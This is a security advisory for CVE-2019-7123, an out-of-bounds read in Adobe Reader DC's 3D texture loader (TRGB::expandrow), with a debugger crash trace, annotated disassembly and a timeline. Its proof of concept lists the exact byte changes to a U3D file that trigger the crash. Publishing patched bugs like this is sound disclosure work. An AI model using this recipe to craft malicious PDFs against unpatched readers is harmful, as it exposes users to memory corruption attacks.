Advisories

Acrobat Reader DC 2d.x3d!_LoadRGB() Memory Corruption in TRGB::expandrow()

CVE ID

CVE-2019-7123

Tested Versions

  • Adobe Reader DC 2019.010.20064

Product URL(s)

  • https://acrobat.adobe.com/us/en/acrobat.html
  • https://get.adobe.com/reader/

Adobe Acrobat is a family of application software and Web services developed by Adobe Inc. to view, create, manipulate, print and manage files in Portable Document Format (PDF). It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via 3difr.x3d, 2d.x3d and rt3d.dll, which allow viewing embedded 3D contents in PDF files. The ECMA-363 standard allows external texture images to be encoded with the Texture Resource Declaration Block, with options to load either JPEG/PNG images embedded in the PDF file, or other image types from the local file system. These external image formats include TGA, TIFF, PIC, GIF, BMP, PCX, PPM, IFF, FLI/FLC, RGB, PSD, RLE and CEL. The 2d.x3d module is activated when the users choose to enable 3D content display.

Vulnerabilities in this module do not affect a default installation, however, in certain industry sectors that have frequent exchange of 3D PDF files (e.g., CAD designs), 3D contents may be enabled as default, leaving users vulnerable to this attack vector.

Vulnerability

An out-of-bounds read can be observed in the context of the sandboxed process as the logged on user.

# The debugging and analysis were done on an Adobe Reader DC 2019.010.20064.
# The stack trace at crash site:

(370.1910): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f7aff0 ebx=1cd8f000 ecx=0000e043 edx=1d300f72 esi=0000007f edi=0000008a
eip=6a317b35 esp=00f7af90 ebp=00f7afa0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
2d!png_set_filter_heuristics+0x46d7:
6a317b35 0fb703          movzx   eax,word ptr [ebx]       ds:002b:1cd8f000=????

0:000> kb
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00f7afa0 6a3177b3 1d300f72 00000104 1cd8efc6 2d!png_set_filter_heuristics+0x46d7
01 00f7afe0 6a317a4a 2d1f7f90 24de8fb0 25706e68 2d!png_set_filter_heuristics+0x4355
02 00f7b200 6a312a32 256dafa8 25706e68 24de8fb0 2d!png_set_filter_heuristics+0x45ec
03 00f7b214 6aeb779f 00000006 256dafa8 25706e68 2d!E3DLLFunc+0xb74
04 00f7b234 6ae7ae03 2d1f7f90 00000006 256dafa8 rt3d!FILETYPE::Func2d+0x5e
05 00f7b6bc 6ae79399 334b75a8 00f7bb74 00000000 rt3d!PrepareRescale+0xac8
06 00f7b6f4 6aeac7fd 334b75a8 00f7bb74 00000000 rt3d!GetPicture+0x2e
07 00f7b930 6aead50a 334b75a8 00f7bb74 00000000 rt3d!EndPicturesCache+0x5352
08 00f7bda0 6aeaca3f 334b74e8 334b75a8 00f7c3e8 rt3d!EndPicturesCache+0x605f
09 00f7c5f4 6aeaccfa 334b74e8 00000000 24de8fb0 rt3d!EndPicturesCache+0x5594
0a 00f7c854 6ae5fda1 2c38ccb0 24de8fb0 00000000 rt3d!EndPicturesCache+0x584f
0b 00f7c874 6ade77ea 00000002 24de8fb0 d8538dec rt3d!e3_SCENE::MovePDVToCameraNode+0xfcd
0c 00f7ccf4 6adb3ebd 00000000 2733afc8 00000000 rt3d!V4CUnloadRT+0x30b97
0d 00f7cd0c 6c65c267 2733afc8 00000000 00f7cd60 rt3d+0x3ebd

The out-of-bounds read in TRGB::expandrow():

0:000> u eip
2d!png_set_filter_heuristics+0x46d7:
6a317b35 0fb703      movzx   eax,word ptr [ebx]		// OOB Read
6a317b38 83c302      add     ebx,2
6a317b3b 8802        mov     byte ptr [edx],al		// update row
6a317b3d 8b45fc      mov     eax,dword ptr [ebp-4]
6a317b40 035008      add     edx,dword ptr [eax+8]
6a317b43 2b7808      sub     edi,dword ptr [eax+8]
6a317b46 2b7008      sub     esi,dword ptr [eax+8]
6a317b49 895508      mov     dword ptr [ebp+8],edx	// update expanded row to arg_0

The call stack near crash site is resolved as:

#0 TRGB::expandrow(unsigned char *, unsigned short *)
#1 TRGB::Read(void)
#2 _LoadRGB(e3_STREAM *, e3_PICTURE *, e3_CONTEXT *)
#3 RGBImport(unsigned int, e3_STREAM *, e3_PICTURE *, e3_interface *)
#4 ...

With other combinations of values for the pointer operations, there may be additional implication beyond the OOB read and buffer mismanagement.

Proof of Concept

To load external image with shading_M.u3d:

000002f0: 28 7c 3f 00 00 00 00 00 14 ff ff ff 3c 00 00 00  (|?.........<...
00000300: 00 00 00 00 05 00 6c 69 6e 65 73 02 00 00 00 00  ......lines.....
00000310: 00 00 00 00 01 00 00 00 55 ff ff ff 1c 00 00 00  ........U.......
00000320: 00 00 00 00 05 00 6c 69 6e 65 73 00 01 00 00 00  ......lines.....
00000330: 01 00 00 0e 01 00 00 00 01 0e 00 00 52 dc 00 00  ............R...

The following modifications need to be made to the above block:

# Modify the containing Modifier Chain Block (0xFFFFFF14) length:
; shading_M.u3d: change data size field to 0x54 from 0x3C

# Texture Resource Declaration Block (0xFFFFFF55):
; shading_M.u3d: change data size field to 0x34 from 0x1A

# 2d.x3d Image Loading construction from shading_M.u3d
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height
; 00 01 00 00                // U32: Texture Width
; 0e                         // U8: Texture Image Type: 0x0E color RGB
; 01 00 00 00                // U32: Continuationi Image Count
;                            // Now the Continuation Image Format record
; 01                         //    U8: Compression Type 0x01 JPEG-24
; 0e                         //    U8: Texture Image Channels
; 00 00                      //    U16: Continuation Image Attributes: default
; 52 dc 00 00                //    U32: Image Data Byte Count

# Modify to the following:
; 05 00 6c 69 6e 65 73       // Texture Name String: "lines"
; 00 01 00 00                // U32: Texture Height 
; 00 01 00 00                // U32: Texture Width 
; 0e                         // U8: Texture Image Type: 0x0E color RGB 
; 01 00 00 00                // U32: Continuationi Image Count 
;                            // Now the Continuation Image Format record:
; 02                         //    U8: Compression Type 0x02 PNG
; 0e                         //    U8: Texture Image Channels
; 01 00                      //    U16: Continuation Image Attributes: external
; 01 00 00 00                //    U32: Image URL Count 1
;                            //    0x16 bytes string "httpAAAAAAAsynAA12.pic"
; 16 00 68 74 74 70 41 41 41 41 41 41 41 73 79 6e 41 41 31 32 2e 70 69 63

Vendor Response

The vendor has acknowledged the issue and released an update to address it.

The vendor’s advisory can be found here: APSB19-17.

Timeline

  • 2019-01-25 Vendor disclosure
  • 2019-04-09 Vendor patched

Credit

Discovered by Wei Lei

Want to participate in such cutting-edge research?

We are hiring!

Find Out More